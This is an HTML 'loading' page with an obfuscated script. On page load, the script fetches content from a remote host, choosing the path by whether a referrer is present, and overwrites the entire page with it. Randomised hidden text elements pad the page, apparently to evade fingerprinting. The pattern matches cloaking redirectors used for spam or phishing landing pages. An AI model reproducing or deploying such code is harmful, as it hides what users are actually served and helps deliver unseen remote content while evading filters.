<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .R90OFu {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .R90OFu .QsV7PaL {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .R90OFu .content {
            line-height: 50px;
            text-align: center
        }

        .R90OFu .img {
            width: 100%
        }

        .R90OFu .OO9j7os0 {
            text-align: center
        }

        .R90OFu .OO9j7os0 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .R90OFu .OO9j7os0 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .R90OFu .OO9j7os0 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .R90OFu .OO9j7os0 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .R90OFu .OO9j7os0 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .R90OFu .OO9j7os0 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .R90OFu .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function OUrGn5uH4ze(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var dK6o4z = OUrGn5uH4ze('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ dK6o4z +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ dK6o4z +".html?a=share";
		}
		
        tknWbVC=url+"#"+new Date().getTime();
        tknWbVC && function() {
            $.get(tknWbVC, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>OZOTYQQgyMWfAjTX4nKrV8PPkBRK0as37gxbSznDyb</span>
<span style='display:none'>OZOTYQQgyMWfAjTX4nKrV8PPkBRK0as37gxbSznDyb</span>
<img  src='' style='display:none'>
<b style='display:none' >KQbBNB9WFALSkrWQVbc3fpwh9pJkmkqt8z1A3ZndlTQ3O7UxCykyQAA29a</b><div class="R90OFu">
    <div class="QsV7PaL">
        <div class="OO9j7os0">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>TIVKRRftN0BVJ4vCSjK30jdDUTW8Xs051xUopPIcwrP2JBVgoliwAoE1WyfKC42yM</span>
<p  style='display:none'>tKkkQQlItS7Cs8oQLPLoIKNmX90Zxsm7B0lcjtbGH4N4</p>
<ul style='display:none' >QmHuEcFEI2jpOjxSNwc5qr9L</ul>
<span style='display:none'>TIVKRRftN0BVJ4vCSjK30jdDUTW8Xs051xUopPIcwrP2JBVgoliwAoE1WyfKC42yM</span>
<p  style='display:none'>tKkkQQlItS7Cs8oQLPLoIKNmX90Zxsm7B0lcjtbGH4N4</p>
<ul style='display:none' >QmHuEcFEI2jpOjxSNwc5qr9L</ul>
<a  href='#' style='display:none'>iPQOLtRSx7XqqWhvEzW5mQeSCLf</a>
<b style='display:none' >XCMldMb9g7ryD2aXpXCuZYPsrcL1EUeJIjAjCxR54FmlXyIXT9r3xkoB723VSiu6YQ43</b></body>
</html>